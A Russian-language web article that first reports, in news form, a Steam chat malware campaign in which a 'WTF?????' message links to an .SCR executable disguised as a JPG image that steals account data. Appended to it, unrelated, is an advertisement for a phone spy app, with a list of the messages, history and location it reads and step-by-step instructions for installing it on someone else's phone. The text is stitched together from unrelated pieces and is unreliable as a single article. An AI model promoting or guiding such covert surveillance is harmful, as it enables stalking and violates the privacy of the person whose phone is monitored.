WTF — вредоносное приложение в чате Steam

4335

Graham Cluley, исследователь по безопасности, проанализировал появившуюся недавно вредоносную программу. Распространяется софт исключительно посредством Steam, через чат. Заражение пользователя происходит довольно интересным образом — человеку приходит личное сообщение с текстом «WTF?????», а также ссылка на файл с расширением JPG. На первый взгляд покажется, что это всего лишь изображение в популярном графическом формате. На самом же деле оказывается, что при открытии ссылки срабатывает .SCR, исполняемый файл. В системе Windows он используется для запуска скринсейвера.

Внутри файла располагается вредоносный код, который позволяет злоумышленникам завладеть конфиденциальной информацией юзера. Как считает Cluley, переход по такой ссылке сразу приведёт к заражению, в результате которого может быть похищена пользовательская учётная запись. Даже современные антивирусы не смогут отреагировать на это. Также получение сообщения с подобным текстом говорит о том, что некоторые контакты пользователя уже были заражены. Распространение происходит от человека к человеку, по цепочке. Остановить это можно лишь собственной внимательностью. Поэтому совет поклонникам сервиса один: не переходить по сомнительным ссылкам.

Данная проблема не будет чем-то новым, поскольку уже в сентябре прошлого года аналогичное заявление делала компания MalwareBytes, предупреждая о возможных угрозах. Чат сервиса Steam является крупнейшим среди аналогичных игровых ресурсов. Запущенный Valve сервис предоставляет возможность приобретать цифровые копии игр, а также находить игроков для совместных развлечений. Вопросам безопасности уделяется большое внимание, однако хакеры всегда находятся на несколько шагов впереди.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.